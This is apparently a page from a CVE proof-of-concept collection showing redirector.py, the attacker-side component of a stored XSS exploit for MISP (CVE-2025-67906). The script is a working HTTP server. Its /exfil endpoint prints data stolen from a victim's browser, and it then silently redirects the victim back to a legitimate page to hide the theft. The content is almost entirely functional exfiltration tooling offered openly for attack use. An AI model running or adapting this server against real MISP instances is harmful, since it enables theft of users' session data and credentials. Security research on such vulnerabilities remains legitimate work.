4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-67906
README.md
Rendering markdown...
POC / redirector.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
"""
Exfiltration Redirector for MISP Stored XSS PoC
"""

import http.server
import socketserver
import urllib.parse
import argparse
import sys
import time

# ANSI colors
GREEN = "\033[92m"
RED = "\033[91m"
RESET = "\033[0m"
BOLD = "\033[1m"

class RedirectHandler(http.server.BaseHTTPRequestHandler):
    target_url = "https://google.com"  # Default fallback

    def do_GET(self):
        # Parse query parameters
        parsed_path = urllib.parse.urlparse(self.path)
        query_params = urllib.parse.parse_qs(parsed_path.query)

        # Log request
        print(f"\n{BOLD}[*] Incoming request from {self.client_address[0]}{RESET}")
        print(f"    Path: {self.path}")

        # Handle Exfiltration
        if parsed_path.path == '/exfil':
            if 'data' in query_params:
                data = query_params['data'][0]
                print(f"{GREEN}[+] DATA EXFILTRATED SUCCESSFULLY!{RESET}")
                print("-" * 50)
                print(data)
                print("-" * 50)
            else:
                print(f"{RED}[!] /exfil request received but no data parameter found.{RESET}")

        elif parsed_path.path == '/error':
            if 'msg' in query_params:
                print(f"{RED}[-] Client Error Reported: {query_params['msg'][0]}{RESET}")

        # Redirect back to valid page
        print(f"[*] Redirecting victim back to: {self.target_url}")
        
        self.send_response(302)
        self.send_header('Location', self.target_url)
        self.end_headers()

    def log_message(self, format, *args):
        pass

def start_server(port, target):
    RedirectHandler.target_url = target
    
    # Allow address reuse
    socketserver.TCPServer.allow_reuse_address = True
    
    with socketserver.TCPServer(("", port), RedirectHandler) as httpd:
        print(f"{BOLD}[*] Exfiltration Redirector started on port {port}{RESET}")
        print(f"[*] Redirect target: {target}")
        print("[*] Waiting for victim...\n")
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print(f"\n{RED}[!] Server stopped by user.{RESET}")
            sys.exit(0)

def main():
    parser = argparse.ArgumentParser(description="Exfiltration Redirector Server")
    parser.add_argument("target", help="URL to redirect victim back to (e.g. https://misp.example.com)")
    parser.add_argument("--port", type=int, default=8000, help="Listen port (default: 8000)")
    
    args = parser.parse_args()
    start_server(args.port, args.target)

if __name__ == "__main__":
    main()